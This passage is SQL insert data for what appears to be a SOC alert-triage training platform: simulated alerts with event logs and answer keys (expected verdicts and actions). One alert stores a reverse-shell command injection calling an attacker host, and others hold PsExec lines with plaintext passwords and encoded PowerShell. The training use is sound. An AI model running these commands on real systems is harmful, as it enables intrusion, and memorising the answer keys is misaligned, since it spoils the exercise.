Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Unusual data transfer patterns suggest possible data exfiltration to a known malicious IP.\"}', 'Advanced', 'NDR', 7, 1, 'OT_ICS'), (702, 'False Positive: Legitimate Script Execution Detected', 'low', 'Wazuh', 'A legitimate administrative script was detected using mshta.exe, which can sometimes be misidentified as malicious.', 'Lateral Movement', 'T1218.005', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T12:45:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"\",\"username\":\"admin_user\",\"hostname\":\"ADMIN-SERVER\",\"command_line\":\"mshta.exe http://internal.domain.com/admin_script.hta\"}', '2026-01-10 21:43:29', '2026-01-11 15:04:28', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"command\",\"value\":\"mshta.exe http://internal.domain.com/admin_script.hta\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"URL is a trusted internal domain for administrative purposes.\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.2.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"This is an internal IP address.\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"The script execution was legitimate, originating from a trusted internal source.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'), (703, 'LockBit 3.0 Ransomware Detected via Cobalt Strike Beacon', 'critical', 'CrowdStrike', 'A Cobalt Strike beacon associated with LockBit 3.0 ransomware campaign was detected communicating with a known malicious IP. The beacon exhibited process hollowing tactics.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:22:45Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"176.32.98.45\",\"username\":\"jdoe\",\"hostname\":\"FINANCE-WS01\",\"command_line\":\"C:\\\\Windows\\\\System32\\\\rundll32.exe C:\\\\Users\\\\jdoe\\\\AppData\\\\Roaming\\\\temp.dll,EntryPoint\",\"file_hash\":\"3f8f6c41a65f4b5e3d2e0e5d4b2c6a0f\",\"domain\":\"malicious-domain.com\"}', '2026-01-10 14:55:24', '2026-01-11 15:05:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"176.32.98.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 1003 times for C2 activity\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3f8f6c41a65f4b5e3d2e0e5d4b2c6a0f\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected as LockBit 3.0 ransomware payload\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of affected host\"}}],\"expected_actions\":[\"isolate_host\",\"block_ip\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The presence of a known malicious hash and IP, along with Cobalt Strike beacon activity, confirms the attack.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (704, 'Suspicious Network Traffic to Fast-Flux DNS Domain', 'high', 'Firewall', 'Network traffic to a domain exhibiting fast-flux characteristics was detected. The domain is known to be associated with the BlackCat/ALPHV ransomware group.', 'Command and Control', 'T1071', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:15:30Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.100\",\"dst_ip\":\"203.0.113.120\",\"domain\":\"fluxy-malicious.com\"}', '2026-01-10 21:54:13', '2026-01-11 15:05:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"domain\",\"value\":\"fluxy-malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Domain associated with fast-flux and BlackCat C2 operations\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.100\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Internal IP address of the affected client\"}}],\"expected_actions\":[\"block_ip\",\"block_domain\",\"isolate_host\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"command_and_control\",\"analysis_notes\":\"The fast-flux domain and known association with ransomware C2 activity confirm the threat.\"}', 'Expert', 'NDR', 9, 1, 'OT_ICS'), (705, 'False Positive: Suspected Phishing from Internal Domain', 'medium', 'Proofpoint', 'An email flagged as phishing due to a similar domain name was found to be sent from a legitimate internal source. The email appeared suspicious due to its subject line and formatting.', 'Phishing', 'T1566', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:45:12Z\",\"event_type\":\"email_received\",\"src_ip\":\"192.168.2.15\",\"dst_ip\":\"192.168.2.100\",\"email_sender\":\"alerts@internal-domain.com\",\"subject\":\"Urgent: Update Your Password Immediately\",\"url\":\"https://internal-domain.com/security-update\"}', '2026-01-10 05:58:44', '2026-01-11 15:05:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"alerts@internal-domain.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Legitimate email from internal domain\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"https://internal-domain.com/security-update\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"clean\",\"details\":\"Verified internal URL\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email originated from a legitimate internal source and was incorrectly flagged due to its subject and formatting.\"}', 'Expert', 'SIEM', 9, 1, 'OT_ICS'), (706, 'APT Lateral Movement via PsExec Detected', 'high', 'Wazuh', 'An APT actor was detected using PsExec for lateral movement within the network, targeting several internal hosts over SMB.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T06:30:50Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.20\",\"dst_ip\":\"10.0.0.25\",\"username\":\"admin_user\",\"hostname\":\"CORP-SERVER01\",\"command_line\":\"C:\\\\tools\\\\PsExec.exe \\\\\\\\10.0.0.25 -u admin_user -p password cmd\"}', '2026-01-11 08:30:21', '2026-01-11 15:05:01', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Source IP address of the initiating host\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.25\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Analysis\",\"verdict\":\"internal\",\"details\":\"Target IP address of the lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"C:\\\\tools\\\\PsExec.exe \\\\\\\\10.0.0.25 -u admin_user -p password cmd\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"suspicious\",\"details\":\"PsExec usage detected, often used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"Use of PsExec for lateral movement is a known tactic of APT groups, confirming the suspicious activity.\"}', 'Expert', 'EDR', 9, 1, 'OT_ICS'), (707, 'Brute Force Login Attempt Detected', 'high', 'Splunk', 'Multiple failed login attempts detected from a known malicious IP address. The source is from a foreign location.', 'Credential Attack', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:30Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"corp-server-01\",\"failed_attempts\":35}', '2026-01-09 17:39:12', '2026-01-11 15:06:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"192.168.1.10\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Valid internal username\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The number of failed attempts and the source IP\'s malicious history confirm this as a brute force attack.\"}', 'Novice', 'SIEM', 1, 1, 'TECH'), (708, 'Malware Detected on Endpoint', 'critical', 'CrowdStrike', 'A known malware signature was detected on an endpoint. The malware has a high detection rate on VirusTotal.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:15Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.20\",\"hostname\":\"workstation-02\",\"command_line\":\"C:\\\\malicious\\\\malware.exe\",\"file_hash\":\"e99a18c428cb38d5f260853678922e03\"}', '2026-01-10 06:01:10', '2026-01-11 15:06:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"hash\",\"value\":\"e99a18c428cb38d5f260853678922e03\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Detected by 60/70 AV engines\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"C:\\\\malicious\\\\malware.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"CrowdStrike\",\"verdict\":\"malicious\",\"details\":\"Confirmed execution of known malware\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}}],\"expected_actions\":[\"isolate_host\",\"block_hash\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The hash is widely recognized as malicious, indicating a confirmed malware infection.\"}', 'Novice', 'EDR', 1, 1, 'OT_ICS'), (709, 'Phishing Email with Malicious Link Detected', 'medium', 'Proofpoint', 'A phishing email was detected with a link leading to a known malicious site.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:20:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"email_sender\":\"phisher@malicious.com\",\"url\":\"http://malicious-site.com/fake-login\",\"username\":\"jdoe\",\"hostname\":\"user-laptop-03\"}', '2026-01-10 16:11:58', '2026-01-11 15:06:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"phisher@malicious.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"Proofpoint\",\"verdict\":\"malicious\",\"details\":\"Known phishing campaign sender\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-site.com/fake-login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"Site hosting phishing login page\"}},{\"id\":\"artifact_3\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP linked to multiple phishing sites\"}}],\"expected_actions\":[\"block_url\",\"close_alert\",\"user_education\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a link to a known phishing site, confirming the phishing attempt.\"}', 'Novice', 'SIEM', 1, 1, 'OT_ICS'), (710, 'Suspicious Network Activity Detected', 'low', 'Firewall', 'An unusual spike in outbound traffic was detected from an internal server, but no malicious activity was confirmed.', 'Data Exfiltration', 'T1041', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:15:50Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.15\",\"dst_ip\":\"203.0.113.200\",\"hostname\":\"internal-server-01\",\"bytes_sent\":5000000}', '2026-01-09 23:38:05', '2026-01-11 15:06:27', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.15\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Internal server IP address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"203.0.113.200\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP observed in benign traffic, no confirmed malicious reports\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"data_exfiltration\",\"analysis_notes\":\"Traffic was determined to be a legitimate data transfer after further analysis.\"}', 'Novice', 'NDR', 1, 1, 'TECH'), (711, 'APT41 Command Injection Detected', 'high', 'Wazuh', 'A command injection attempt was identified on a web server. The attacker executed a shell command which could allow them to gain unauthorized access to the system.', 'Web Attack', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:45:32Z\",\"event_type\":\"process_execution\",\"src_ip\":\"203.0.113.45\",\"dst_ip\":\"10.0.0.15\",\"username\":\"webadmin\",\"hostname\":\"web-server-01\",\"command_line\":\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\"}', '2026-01-09 18:42:52', '2026-01-11 15:06:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.45\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"command\",\"value\":\"curl http://malicious-site.com; bash -i >& /dev/tcp/203.0.113.45/4444 0>&1\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"Command injection detected\"}}],\"expected_actions\":[\"block_ip\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"web_attack\",\"analysis_notes\":\"The presence of a command injection attempt with a known malicious IP confirms the alert as true positive.\"}', 'Beginner', 'EDR', 3, 1, 'OT_ICS'), (712, 'Spear-Phishing Attempt by APT29', 'medium', 'Proofpoint', 'A spear-phishing email was detected targeting the finance department. It included a link to a credential harvesting site.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:15:47Z\",\"event_type\":\"email_received\",\"src_ip\":\"198.51.100.22\",\"username\":\"j.doe@company.com\",\"hostname\":\"mail-server-01\",\"email_sender\":\"finance@trusted-source.com\",\"url\":\"http://malicious-link.com/login\"}', '2026-01-10 20:11:25', '2026-01-11 15:06:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"email\",\"value\":\"finance@trusted-source.com\",\"is_critical\":true,\"osint_result\":{\"source\":\"EmailRep\",\"verdict\":\"suspicious\",\"details\":\"Domain used in multiple phishing campaigns\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-link.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL classified as phishing site\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The phishing URL and suspicious sender email confirm the phishing attempt, marking it as true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'GOVERNMENT'), (713, 'Failed Login Attempts from Unusual Location', 'low', 'Splunk', 'Multiple failed login attempts detected for user \'admin\' from a foreign IP address indicating potential brute force attack.', 'Credential Attack', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T14:22:59Z\",\"event_type\":\"login_failure\",\"src_ip\":\"212.47.229.1\",\"dst_ip\":\"192.168.1.10\",\"username\":\"admin\",\"hostname\":\"auth-server-01\",\"failed_attempts\":15}', '2026-01-09 22:20:35', '2026-01-11 15:06:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"212.47.229.1\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP involved in multiple unauthorized access attempts\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"admin\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Standard admin account for internal systems\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The failed login attempts from a suspicious IP suggest a brute force attack, making it a true positive.\"}', 'Beginner', 'SIEM', 3, 1, 'OT_ICS'), (714, 'Suspicious Network Activity Detected (False Positive)', 'medium', 'Firewall', 'Unusual network traffic was detected from an internal IP to an external cloud service. Further investigation reveals this as legitimate user activity.', 'Network Anomaly', 'T1078', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T16:30:12Z\",\"event_type\":\"network_connection\",\"src_ip\":\"192.168.1.20\",\"dst_ip\":\"52.34.67.89\",\"username\":\"m.smith\",\"hostname\":\"user-pc-02\",\"domain\":\"cloud-storage.com\"}', '2026-01-10 13:30:15', '2026-01-11 15:06:47', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal IP address\"}},{\"id\":\"artifact_2\",\"type\":\"domain\",\"value\":\"cloud-storage.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"clean\",\"details\":\"Legitimate cloud storage service\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_activity\",\"analysis_notes\":\"The traffic was confirmed to be legitimate access to a known cloud service by an authorized user, hence a false positive.\"}', 'Beginner', 'NDR', 3, 1, 'OT_ICS'), (715, 'Malicious File Execution Detected', 'high', 'CrowdStrike', 'A suspicious process was executed on the host, potentially linked to APT41 activity. The process resembles known malware used for data exfiltration.', 'Malware', 'T1059', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T10:45:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.25\",\"dst_ip\":\"203.0.113.45\",\"username\":\"jdoe\",\"hostname\":\"host-001\",\"command_line\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAYwBvAG0AbQBhAG4AZAAgAC0AZQBuAGMAbwBkAGUAZABiAHkAdABlAHMAPQAiAFsAMgAsADIANgAsADIAOAAsADMAQgAsADQALAAxADgALAAxADcALAAxADkALAAyADAALAAzADkALAAxADkALAAyADAALAA5ADUALAA5ADUALAA5ADMAIgBdAA==\",\"file_hash\":\"3fa4e4bd6a8f7a8c5b2aabc1d7b9f4d2\"}', '2026-01-11 07:59:37', '2026-01-11 15:07:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"192.168.1.25\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"hash\",\"value\":\"3fa4e4bd6a8f7a8c5b2aabc1d7b9f4d2\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"Hash associated with APT41 malware\"}},{\"id\":\"artifact_3\",\"type\":\"command\",\"value\":\"powershell.exe -EncodedCommand UABvAHcAZQByAFMAaABlAGwAbAAgAC0AZQBuAGMAbwBkAGUAYwBvAG0AbQBhAG4AZAAgAC0AZQBuAGMAbwBkAGUAZABiAHkAdABlAHMAPQAiAFsAMgAsADIANgAsADIAOAAsADMAQgAsADQALAAxADgALAAxADcALAAxADkALAAyADAALAAzADkALAAxADkALAAyADAALAA5ADUALAA5ADUALAA5ADMAIgBdAA==\",\"is_critical\":true,\"osint_result\":{\"source\":\"Hybrid Analysis\",\"verdict\":\"malicious\",\"details\":\"Encoded command indicative of malicious activity\"}}],\"expected_actions\":[\"block_hash\",\"isolate_host\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"malware\",\"analysis_notes\":\"The decoded PowerShell command and the file hash are linked to known APT41 malware, indicating a true positive.\"}', 'Intermediate', 'EDR', 5, 1, 'OT_ICS'), (716, 'Suspicious Login Attempt Detected from Foreign IP', 'medium', 'SIEM', 'Multiple failed login attempts detected from a suspicious IP address. This could indicate a brute force attack targeting user credentials.', 'Brute Force', 'T1110', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T09:30:00Z\",\"event_type\":\"login_failure\",\"src_ip\":\"198.51.100.23\",\"username\":\"asmith\",\"hostname\":\"host-002\",\"failed_attempts\":15}', '2026-01-10 14:22:49', '2026-01-11 15:07:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"198.51.100.23\",\"is_critical\":true,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"malicious\",\"details\":\"IP reported 847 times for brute force attacks\"}},{\"id\":\"artifact_2\",\"type\":\"username\",\"value\":\"asmith\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Valid internal user account\"}}],\"expected_actions\":[\"block_ip\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"credential_attack\",\"analysis_notes\":\"The multiple failed login attempts from a known malicious IP address confirm a brute force attack.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'), (717, 'Phishing Email with Malicious URL Detected', 'high', 'Proofpoint', 'A phishing email was received with a URL designed to harvest credentials. The email mimics a trusted service to lure the user.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T11:00:00Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.20\",\"email_sender\":\"no-reply@trustedservice.com\",\"username\":\"mjane\",\"hostname\":\"host-003\",\"url\":\"http://malicious-site.com/login\"}', '2026-01-09 19:07:59', '2026-01-11 15:07:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.20\",\"is_critical\":false,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"suspicious\",\"details\":\"IP associated with phishing activity\"}},{\"id\":\"artifact_2\",\"type\":\"email\",\"value\":\"no-reply@trustedservice.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Email appears to mimic a trusted domain\"}},{\"id\":\"artifact_3\",\"type\":\"url\",\"value\":\"http://malicious-site.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"VirusTotal\",\"verdict\":\"malicious\",\"details\":\"URL is flagged as a credential harvesting site\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The malicious URL in the phishing email is confirmed to be used for credential harvesting, indicating a true positive.\"}', 'Intermediate', 'SIEM', 5, 1, 'OT_ICS'), (718, 'False Positive Alert: Unusual Internal Traffic', 'low', 'Firewall', 'Detected unusual traffic patterns between internal hosts. Further analysis indicates this is benign activity related to scheduled maintenance.', 'Network Traffic Anomaly', 'T1071', 0, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:15:00Z\",\"event_type\":\"network_connection\",\"src_ip\":\"10.0.0.5\",\"dst_ip\":\"10.0.0.8\",\"username\":\"n/a\",\"hostname\":\"n/a\",\"request_body\":\"n/a\"}', '2026-01-10 22:11:35', '2026-01-11 15:07:13', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.5\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.8\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal\",\"verdict\":\"internal\",\"details\":\"Internal network address\"}}],\"expected_actions\":[\"close_alert\"],\"expected_verdict\":\"false_positive\",\"expected_category\":\"network_traffic\",\"analysis_notes\":\"The traffic is consistent with scheduled internal maintenance tasks, confirming a false positive.\"}', 'Intermediate', 'NDR', 5, 1, 'OT_ICS'), (719, 'APT29 Lateral Movement Detected via PsExec', 'critical', 'CrowdStrike', 'A potential APT29 operation has been detected using PsExec to move laterally within the network. Internal IP communication suggests compromised credentials.', 'Lateral Movement', 'T1077', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T03:14:00Z\",\"event_type\":\"process_execution\",\"src_ip\":\"10.0.0.21\",\"dst_ip\":\"10.0.0.34\",\"username\":\"jdoe\",\"hostname\":\"FINANCE-01\",\"command_line\":\"PsExec.exe \\\\\\\\10.0.0.34 -u jdoe -p password cmd.exe\"}', '2026-01-10 01:17:50', '2026-01-11 15:07:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"10.0.0.21\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Internal IP address used in lateral movement\"}},{\"id\":\"artifact_2\",\"type\":\"ip\",\"value\":\"10.0.0.34\",\"is_critical\":true,\"osint_result\":{\"source\":\"Internal Network\",\"verdict\":\"internal\",\"details\":\"Target internal IP address for lateral movement\"}},{\"id\":\"artifact_3\",\"type\":\"username\",\"value\":\"jdoe\",\"is_critical\":false,\"osint_result\":{\"source\":\"Internal Database\",\"verdict\":\"internal\",\"details\":\"Legitimate internal user account potentially compromised\"}},{\"id\":\"artifact_4\",\"type\":\"command\",\"value\":\"PsExec.exe \\\\\\\\10.0.0.34 -u jdoe -p password cmd.exe\",\"is_critical\":true,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"malicious\",\"details\":\"PsExec tool commonly used for lateral movement\"}}],\"expected_actions\":[\"isolate_host\",\"reset_credentials\",\"collect_forensics\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"lateral_movement\",\"analysis_notes\":\"PsExec usage between internal machines indicates possible lateral movement by APT29.\"}', 'Advanced', 'EDR', 7, 1, 'OT_ICS'), (720, 'Spear-Phishing Email with Malicious URL', 'high', 'Proofpoint', 'An email from a suspicious sender was detected containing a malicious URL likely used for credential harvesting.', 'Phishing', 'T1566', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T08:25:45Z\",\"event_type\":\"email_received\",\"src_ip\":\"203.0.113.85\",\"dst_ip\":\"192.168.1.45\",\"username\":\"jane.smith\",\"hostname\":\"LAPTOP-04\",\"email_sender\":\"support@secure-mail.com\",\"url\":\"http://malicious-website.com/login\"}', '2026-01-11 06:08:40', '2026-01-11 15:07:32', '{\"playbook_version\":2,\"artifacts\":[{\"id\":\"artifact_1\",\"type\":\"ip\",\"value\":\"203.0.113.85\",\"is_critical\":false,\"osint_result\":{\"source\":\"AbuseIPDB\",\"verdict\":\"suspicious\",\"details\":\"IP reported 12 times for suspicious activity\"}},{\"id\":\"artifact_2\",\"type\":\"url\",\"value\":\"http://malicious-website.com/login\",\"is_critical\":true,\"osint_result\":{\"source\":\"URLScan\",\"verdict\":\"malicious\",\"details\":\"URL flagged for phishing credential harvest\"}},{\"id\":\"artifact_3\",\"type\":\"email\",\"value\":\"support@secure-mail.com\",\"is_critical\":false,\"osint_result\":{\"source\":\"Pattern Analysis\",\"verdict\":\"suspicious\",\"details\":\"Email domain used for spoofing legitimate services\"}}],\"expected_actions\":[\"block_url\",\"reset_credentials\",\"close_alert\"],\"expected_verdict\":\"true_positive\",\"expected_category\":\"phishing\",\"analysis_notes\":\"The email contains a known phishing URL attempting to mimic legitimate services.\"}', 'Advanced', 'SIEM', 7, 1, 'OT_ICS'), (721, 'Encoded PowerShell Command Execution Detected', 'high', 'Wazuh', 'An encoded PowerShell command was detected on a user machine, indicating possible fileless malware activity.', 'Malware', 'T1059.001', 1, 'New', NULL, '{\"timestamp\":\"2026-01-11T15:42:30Z\",\"event_type\":\"process_execution\",\"src_ip\":\"192.168.1.50\",\"dst_ip\":\"\",\"username\":\"michael.brown\",\"hostname\":\"DESKTOP-07\",\"command_line\":\"powershell.exe -enc aW1wb3J0LXdpbiBtd2lzO3N0YXJ0LWpvYiB3bWk7\"}', '2026-01-10 07:11:45', '2026-01-11 15:07:32', 